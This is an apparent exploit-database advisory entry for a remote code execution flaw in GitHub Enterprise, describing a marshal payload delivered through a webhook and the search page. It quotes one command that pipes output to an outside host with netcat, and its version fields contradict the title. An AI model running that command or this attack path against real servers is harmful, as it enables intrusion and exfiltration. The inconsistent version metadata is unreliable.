vendor:
GitHub Enterprise
by:
orange@chroot.org
9,8
CVSS
HIGH
Remote Code Execution
N/A
CWE
Product Name: GitHub Enterprise
Affected Version From: 2.8.7
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
GitHub Enterprise < 2.8.7 Remote Code Execution
This exploit allows an attacker to execute arbitrary code on a vulnerable GitHub Enterprise server. The exploit works by sending a specially crafted payload to the server via a POST request. The payload contains a malicious marshal code which is then executed by the server. The code is then used to execute a command on the server, such as 'id | nc orange.tw 12345'. The exploit can be triggered by inserting a webhook from the settings page of a repository and then triggering the RCE from the search page.
Mitigation:
Upgrade to the latest version of GitHub Enterprise.